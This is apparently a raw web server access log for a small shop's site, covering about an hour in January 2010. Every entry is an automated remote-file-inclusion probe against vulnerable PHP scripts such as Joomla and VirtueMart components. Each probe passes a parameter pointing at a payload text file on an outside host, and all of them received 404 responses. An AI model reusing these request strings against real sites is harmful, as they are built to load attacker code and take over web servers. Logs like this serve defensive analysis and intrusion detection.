122.155.10.89 - - [10/Jan/2010:23:23:49 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:49 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:49 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.155.10.89 - - [10/Jan/2010:23:23:51 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mygospel.net/biblelog/mybible/data/bible/newkor/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [10/Jan/2010:23:24:15 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [10/Jan/2010:23:24:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [10/Jan/2010:23:24:15 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [10/Jan/2010:23:26:43 -0800] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.12.13.152 - - [10/Jan/2010:23:26:43 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:28:03 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:29:42 -0800] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [10/Jan/2010:23:29:42 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:33:57 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:33:57 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:33:57 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:34:02 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:34:02 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:34:03 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:35:33 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:35:33 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:35:33 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:23:37:11 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:23:37:11 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:23:37:11 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:39:50 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:39:50 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:39:50 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:43:11 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:43:11 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:43:11 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:43:32 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:43:32 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:43:32 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:46:22 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:46:22 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:46:22 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:46:23 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:46:23 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:46:23 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:48:03 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:48:04 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:48:04 -0800] "GET /logs/access.log%20%20/skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:48:31 -0800] "GET /logs/access.log%20%20/skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:48:31 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:48:31 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:48:49 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:48:49 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:48:49 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:49:00 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:49:00 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:49:00 -0800] "GET /logs/access.log%20%20///skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:49:09 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:49:10 -0800] "GET /logs/access.log%20%20///skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [10/Jan/2010:23:49:12 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:52:04 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:52:04 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [10/Jan/2010:23:52:04 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:54:46 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:54:46 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:54:46 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:54:46 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:54:46 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [10/Jan/2010:23:54:47 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:01:37 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:02:02 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:02:02 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:02:02 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:02:09 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:02:09 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:02:09 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:04:11 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:04:11 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:04:12 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:04:12 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:04:12 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:04:12 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:04:58 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:04:58 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:04:58 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:08:59 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:08:59 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:09:12 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:00:09:12 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:12:03 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:12:03 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:12:03 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:12:03 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:12:03 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:12:03 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:21:43 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:21:43 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:21:43 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:22:26 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:22:26 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.223.143.131 - - [11/Jan/2010:00:22:26 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:22:49 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:22:49 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:22:49 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:22:52 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:22:52 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:00:22:52 -0800] "GET /administrator/components/com_admin/export.php?mosConfig.absolute.path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.145.29.142 - - [11/Jan/2010:00:27:04 -0800] "GET /logs//administrator/components/com_admin/export.php?mosConfig.absolute.path=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
